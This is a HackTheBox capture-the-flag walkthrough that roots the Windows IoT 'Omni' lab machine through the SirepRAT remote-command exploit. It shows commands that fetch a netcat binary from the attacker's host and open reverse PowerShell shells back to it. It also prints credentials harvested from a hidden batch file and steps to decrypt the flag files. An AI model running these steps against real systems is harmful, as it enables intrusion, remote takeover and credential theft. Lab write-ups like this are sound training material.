Omni HackTheBox WalkThrough
This is Omni HackTheBox walkthrough. In this writeup, I have demonstrated step by step how I rooted to the Omni
HTB machine. Before starting let us know something about this machine. Its OS is not known hence it is categorized as other
. Given security level easy
by its maker and has been assigned IP address 10.10.10.204
.
First of all, connect your local machine with VPN so that you can have access to the lab machines and confirm the connectivity by pinging the IP address 10.10.10.204. If all correct then start hacking.
As usual, I began by scanning the IP address so that I could get some starting point. Nmap
[a port scanner] gave the following result.
Scanning
$ nmap -sV -sC -O -oN omni_scan 10.10.10.204
Nmap revealed that ports 135 and 8080 are open. Msrpc
is running on port 135 and IIS web server
is running over 8080. Ongoing to URL http://10.10.10.204:8008/ found a login page, as we have in tomcat web server and a message, which says Windows Device Portal
.
On Googling Windows Device Portal
reveals that it a web server through which you can manage and configure your IoT devices remotely using web browser. It also provides advanced diagnostic tools to help you troubleshoot and view the real-time performance of your Windows device.
As I got some information about the software being used, immediately googled Windows Device Portal exploit
for available public exploits for this software. Got this article in the first page of the search results. After reading this article came to know that Windows IoT Operating System is affected with a RCE vulnerability
in which an attacker can exploit Sirep/WPCon
communications protocol to execute command on the OS without dropping payload into the OS. For more information about the exploit and it’s usage you can refer to this GitHub repository.
We have exploit let us use it to confirm whether we have Remote Code Execution or not.
Testing Exploit
$ git clone https://github.com/SafeBreach-Labs/SirepRAT.git
$ cd SirepRAT/
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell.exe ipconfig" --v
We can clearly see we can execute OS command remotely. Therefore, to get reverse shell I dropped a netcat binary inside the public writeable folder of windows OS and then executed command to connect to our machine. You can get a list of public writable folder from this repository.
Getting Shell
$ python3 -m http.server 80 # To Start python web server locally by hosting nc64.exe file
$ rlwrap nc -nvlp 4321
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\net1.exe -Uri http://10.10.14.86/nc64.exe" --v
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\net1.exe 10.10.14.6 4321 -e powershell.exe" --v
Note: If you are using C:\Windows\System32\spool\drivers\color\ directory to download your binary you may get an error that ‘nc64.exe is being used by some other program’. To avoid this error you can use C:\Windows\System32\spool\ directory and rename the binary from nc64.exe to net1.exe before downloading remotely. Alternatively, follow the command as I have used.
We got a shell. Just confirmed it by running $env:UserName
(Used $env because whoami
command is not present).
Tried to access C:\Users\
directory to list the number of users in the box but, no user is present inside the Users folder. Used command $net user
to list all the users we have.
$ net user
We have two users Administrator
and app
. However, they are not present in their default directory. May be in some other drive? Let us check. Used $Get-PSDrive
PowerShell command to list all the drives in Omni machine.
For more info about Omni machine you can run PowerShell cmdlet $Get-Computerinfo
$ Get-PSDrive
Get-PSDrive tells that omni machine has three drive namely C
, D
, & U
. Changed the drive to U and found the users app and administrator inside the directory U:\Users\
. We can capture the user flag now.
$ type U:\Users\app\user.txt
It appears that user flag is encrypted using PowerShell function to prevent unauthorized access. Did not know how to decrypt it. Just googled PowerShell Password Decryption
got this appropriate link on first page. According to this website, user.txt can be decrypted using following method.
$ UserCreds = Import-CliXml -Path U:\Users\app\user.txt
$ UserCreds.GetNetworkCredential().Password
When tried to decrypt got error. This error is probably due to unauthorized access to user.txt file. Because user.txt file is owned by user app and currently, we are logged in as omni. So anyhow, we have to login using user app creds. But currently we don’t have any credential of user app. After some enumeration got directory
C:\Program Files\WindowsPowerShell\Modules\PAckageManagement\
, which contain a hidden file, named r.bat
. The content of the file r.bat can be accessed by using
$ type C:\'Program Files'\WindowsPowerShell\Modules\PAckageManagement\r.bat
From above file got some credentials app
: mesh5143
& administrator
: _1nt3rn37ofTh1nGz
Since we have login panel at http://10.10.10.204:8080. Let us use credential app
: mesh5143
to login as user app.
Login into Portal
We are successfully logged in. Windows Device Portal (WDP) gives us facility to manage all the processes using command prompt. We can run our command using the run command
panel.
Since we have already dropped our netcat binary
[renamed to net1.exe] inside the directory C:\Windows\System32\Spool\
so, we will use this binary to get reverse connection on our netcat listener locally. As we are now logged in as user app, our reverse shell will be of the user app privilege and we can easily decrypt the content of user.txt file. So ran below command to get shell.
$ rlwrap nc -nvlp 2345
# Run it locally to get reverse connection
$ C:\Windows\System32\spool\net1.exe 10.10.14.86 2345 -e powershell.exe
# on command prompt window of WDP. You can get error as below but you will find your command is executed.
Capture User Flag
$ $UserCreds = Import-CliXml -Path U:\Users\app\user.txt
$ $UserCreds.GetNetworkCredential().Password
Privilege Escalation
We also have administrator account credential from the r.bat
file. We just need to logout
from the user app
account and then login to user administrator
and follow the same steps as we did with user app. To logout from the user app just close the browser window and clear your browsing history to remove logged in cookie. And then log in using the credentials administrator
:_1nt3rn37ofTh1nGz
and execute the same command as you did with user app by changing the listening port of netcat.
$ rlwrap nc -nvlp 3456
$ C:\Windows\System32\spool\net1.exe 10.10.14.86 3456 -e powershell.exe
We got an administrative privilege shell. So we have successfully escalated the privilege to admin user.
Capture Root Flag
# $UserCreds = Import-CliXml -Path U:\Users\administrator\root.txt
# $UserCreds.GetNetworkCredential().Password
This was how I rooted Omni HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any query and suggestion related to walkthrough, feel free to contact us at [email protected].